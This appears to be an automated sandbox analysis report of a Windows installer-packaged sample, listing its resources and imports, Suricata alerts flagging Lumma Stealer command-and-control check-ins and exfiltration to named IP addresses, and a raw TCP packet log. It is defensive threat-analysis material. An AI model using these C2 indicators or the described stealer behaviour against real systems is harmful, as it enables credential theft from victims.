                                                                                                                                                                                                                                                            RT_STRING0x117fc40x3dcdata0.39271255060728744
                                                                                                                                                                                                                                                            RT_STRING0x1183a00x360data0.37037037037037035
                                                                                                                                                                                                                                                            RT_STRING0x1187000x40cdata0.3783783783783784
                                                                                                                                                                                                                                                            RT_STRING0x118b0c0x108data0.5113636363636364
                                                                                                                                                                                                                                                            RT_STRING0x118c140xccdata0.6029411764705882
                                                                                                                                                                                                                                                            RT_STRING0x118ce00x234data0.5070921985815603
                                                                                                                                                                                                                                                            RT_STRING0x118f140x3c8data0.3181818181818182
                                                                                                                                                                                                                                                            RT_STRING0x1192dc0x32cdata0.43349753694581283
                                                                                                                                                                                                                                                            RT_STRING0x1196080x2a0data0.41964285714285715
                                                                                                                                                                                                                                                            RT_RCDATA0x1198a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                                                                                                                            RT_RCDATA0x121b900x10data1.5
                                                                                                                                                                                                                                                            RT_RCDATA0x121ba00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                                                                            RT_RCDATA0x1233a00x6bcdata0.6467517401392111
                                                                                                                                                                                                                                                            RT_RCDATA0x123a5c0x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                                                                                                                            RT_RCDATA0x12956c0x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                                                                                                                            RT_RCDATA0x1296940x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                                                                                                                            RT_RCDATA0x129a380x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                                                                                                                            RT_RCDATA0x129d580x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                                                                                                                            RT_RCDATA0x12a0580x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                                                                                                                            RT_RCDATA0x12a6340x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                                                                                                            RT_RCDATA0x12aa980x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cb900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_CURSOR0x12cba40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                            RT_GROUP_ICON0x12cbb80x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                                                                                                                            RT_VERSION0x12cbf80x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                                                                            RT_MANIFEST0x12cd540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                                                                                                            user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                                                                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                                                                                                                            user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                                                            msimg32.dllAlphaBlend
                                                                                                                                                                                                                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                                                                                                                            version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                                                                                                                            mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                                                                                                                            kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                                                                                                                            advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                                                                                                                            comctl32.dllInitCommonControls
                                                                                                                                                                                                                                                            kernel32.dllSleep
                                                                                                                                                                                                                                                            oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                                                                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                                                            comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                                                            shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                                                                                                                            shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                                                                                                                            comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                            ole32.dllCoDisconnectObject
                                                                                                                                                                                                                                                            advapi32.dllAdjustTokenPrivileges
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString

                                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                            2025-01-01T19:04:08.344709+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:08.816400+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:08.816400+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:09.311045+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:09.783359+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:09.783359+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:11.270377+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:12.448901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:14.278008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:15.682517+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:17.006219+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:17.558778+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:18.066412+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:18.594781+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743172.67.198.102443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:19.451220+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744185.161.251.21443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:20.291151+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.37.128443TCP
                                                                                                                                                                                                                                                            2025-01-01T19:04:20.680174+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.37.128443192.168.2.449745TCP

                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.858944893 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.858992100 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.859071970 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.861939907 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:07.861959934 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.344630957 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.344708920 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.347980976 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.347990036 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.348196983 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.396812916 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.396835089 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.396917105 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.816405058 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.816488981 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.816548109 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.818630934 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.818648100 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.818662882 CET49730443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.818670034 CET44349730172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.828988075 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.829088926 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.829207897 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.829514027 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:08.829551935 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.310950041 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.311044931 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.314785957 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.314805984 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.315016985 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.317022085 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.317133904 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.317162991 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779613972 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779664040 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779689074 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779719114 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779748917 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779787064 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779799938 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779815912 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779855967 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779885054 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779917002 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.779968977 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.780081987 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.780358076 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.780402899 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.780432940 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784471989 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784529924 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784543037 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784562111 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784617901 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784909964 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784953117 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784985065 CET49731443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:09.784998894 CET44349731172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718259096 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718293905 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718389034 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718750954 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718764067 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.270279884 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.270376921 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272243977 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272249937 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272459984 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274406910 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274566889 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274595976 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274647951 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274653912 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830346107 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830427885 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830483913 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830797911 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830809116 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965522051 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965593100 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965662003 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.966074944 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.966094017 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.448832989 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.448900938 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451247931 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451256037 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451494932 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453174114 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453293085 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453325033 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.958775997 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.958853006 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.963339090 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.963500023 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.966152906 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.980912924 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.980935097 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:13.818700075 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:13.818743944 CET44349735172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:13.818814993 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:13.819138050 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:13.819154024 CET44349735172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.277935028 CET44349735172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.278007984 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.280157089 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.280169010 CET44349735172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.280378103 CET44349735172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.281963110 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.282205105 CET49735443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:14.282238960 CET44349735172.67.198.102192.168.2.4
